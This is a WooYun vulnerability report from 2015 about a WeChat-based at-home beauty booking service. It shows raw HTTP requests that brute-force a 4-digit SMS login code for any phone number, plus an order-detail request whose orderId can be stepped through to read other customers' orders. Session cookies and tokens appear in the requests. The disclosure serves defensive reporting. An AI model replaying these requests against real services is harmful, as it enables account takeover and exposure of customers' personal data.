当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157136

漏洞标题:容么么上门美容O2O未授权访问/任意用户登陆(13888888888为例)/

相关厂商:北京高比格科技有限公司

漏洞作者: milan

提交时间:2015-12-01 20:59

修复时间:2016-01-15 21:00

公开时间:2016-01-15 21:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某上门美容O2O任意用户登陆

详细说明:

微信公众号登陆时,只需要手机号和验证码,验证码为四位。四位爆破

POST /site/login HTTP/1.1
Host: wechat.rongmomo.cc
Accept: application/json, text/javascript, */*; q=0.01
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://wechat.rongmomo.cc
Content-Length: 112
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13B143 MicroMessenger/6.3.7 NetType/WIFI Language/zh_CN
Referer: http://wechat.rongmomo.cc/site/login
Cookie: PHPSESSID=rp11cavm433sb45pis0ut7jpl4; _csrf=95f86ab8ba8a4a30b120d56e1a64caaa16981c700ba0d328e3827acdf94b4be7a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22HQCr33iLh4Qa3eu94KyMr13KvGlY6wQo%22%3B%7D; checkoutOrder=%7B%22order_id%22%3A85732%2C%22number%22%3A%221573785732%22%2C%22paid_amount%22%3A228%2C%22created_at%22%3A%222015-11-30+18%3A05%22%2C%22service_time%22%3A%222015-11-30+22%3A00%22%2C%22service_hours%22%3A90%2C%22finish_time%22%3A%222015-11-30+23%3A30%22%2C%22payment%22%3A1%7D; current_city=%7B%22id%22%3A%222%22%2C%22name%22%3A%22%E4%B8%8A%E6%B5%B7%E5%B8%82%22%7D; locate=1
mobile=13888888888&captcha=9220&_csrf=QXFVZndmZHYJIBYURFUNOilFBAdEAxFPdTosKwVXVz03Njk%2FQRE1GQ%3D%3D&reference=0


1.jpg


1.jpg


漏洞证明:

微信公众号查看订单请求,遍历orderId即可

GET /order/detail?orderId=85731 HTTP/1.1
Host: wechat.rongmomo.cc
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=c3v80m9m1n6csbjcl792l1duc0; _csrf=95f86ab8ba8a4a30b120d56e1a64caaa16981c700ba0d328e3827acdf94b4be7a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22HQCr33iLh4Qa3eu94KyMr13KvGlY6wQo%22%3B%7D; _identity=53eaab2f6b24892bb386e075219dd191974e98feeb5b731042a37313c27238ffa%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A50%3A%22%5B27589%2C%222v3gFv_tlIWmhhywShV72Sa6gI534BdC%22%2C2592000%5D%22%3B%7D; current_city=%7B%22id%22%3A%221%22%2C%22name%22%3A%22%E5%8C%97%E4%BA%AC%E5%B8%82%22%7D; locate=1
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13B143 MicroMessenger/6.3.7 NetType/WIFI Language/zh_CN
Accept-Language: zh-cn
Referer: http://wechat.rongmomo.cc/pay/fail?id=85732&attach=1
Cache-Control: max-age=0


1.jpg


1.jpg

修复方案:

你们最专业

版权声明:转载请注明来源 milan@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝